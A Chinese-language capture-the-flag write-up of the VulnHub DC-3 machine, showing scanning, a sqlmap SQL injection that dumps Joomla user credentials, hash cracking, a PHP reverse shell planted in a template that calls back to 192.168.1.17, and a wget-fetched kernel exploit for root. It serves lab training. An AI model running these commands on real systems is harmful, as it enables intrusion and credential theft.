VulnHub::DC-3

实验环境

DC-3_1

本次只存在一个flag

渗透过程

0x01 信息搜集

由于不知道靶机IP地址,进行D段扫描,获得靶机IP地址:

masscan 192.168.1.0/24 --ping --rate 1000

DC-3_2

测试得知ip为192.168.1.14,进行端口扫描:

sudo masscan 192.168.1.14 -p1-65535 --rate 1000

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-07-08 10:09:16 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 110/tcp on 192.168.1.14                                 
Discovered open port 80/tcp on 192.168.1.14                                 
Discovered open port 25/tcp on 192.168.1.14       

使用nmap进行详细扫描:

DC-3_4

直接访问web服务,是一个Joomla搭建的站。

➜ ~ whatweb http://192.168.1.14
http://192.168.1.14 [200 OK] Apache[2.4.18], Bootstrap, Cookies[460ada11b31d3c5e5ca6e58fd5d3de27], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], HttpOnly[460ada11b31d3c5e5ca6e58fd5d3de27], IP[192.168.1.14], JQuery, MetaGenerator[Joomla! - Open Source Content Management], PasswordField[password], Script[application/json], Title[Home]  

DC-3_3

0x02 开打

进行目录扫描:

DC-3_5

发现README.txt

获得版本号:

DC-3_6

使用JoomScan工具进行验证,得到同样的结果:

DC-3_7

查找Joomla 3.7存在的漏洞:

DC-3_8

发现大部分都为sql注入漏洞,根据已有的payload进行测试。

DC-3_9

发现注入漏洞,使用sqlmap工具获取数据库信息。

payload:python3 sqlmap.py -u "http://192.168.1.14/index.php?option=com_fields&view=fields&layout=modal&l
ist[fullordering]=*" --risk=3 --level=5 --random-agent --dbs

库名:

DC-3_10

列名:

DC-3_11

获得库中具体数据:

python3 sqlmap.py -u "http://192.168.1.14/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C username,password --dump

DC-3_12

使用john工具进行爆破,得到密码:

DC-3_13

登录管理员后台,发现模板的位置可以修改页面源代码:

DC-3_14

index.php页面中加入反弹shell:

DC-3_15

<?php system("bash -c 'bash -i &> /dev/tcp/192.168.1.17/4444 0>&1'");?>

成功反弹shell,查看当前用户:

DC-3_16

使用以下三条命令,可以尝试获取发行版的具体信息:

cat /etc/issue
cat /etc/redhat-release
lsb_release -a

DC-3_17

搜索ubuntu 16.04出现过的漏洞,进行提权:

DC-3_18

挑一些进行尝试,最终39772成功:

首先下载脚本,使用python搭建简单ftp服务器,将脚本下载到靶机上:

python -m SimpleHTTPServer 9000		# python 2
python3 -m http.server 80			# python 3

依次运行以下命令:

wget http://192.168.1.17:9000/exploit.tar
tar xvf exploit.tar
cd ebpf*
bash compile.sh
./doubleput

获得最终flag:

DC-3_19

原文地址:https://www.cnblogs.com/chalan630/p/13363670.html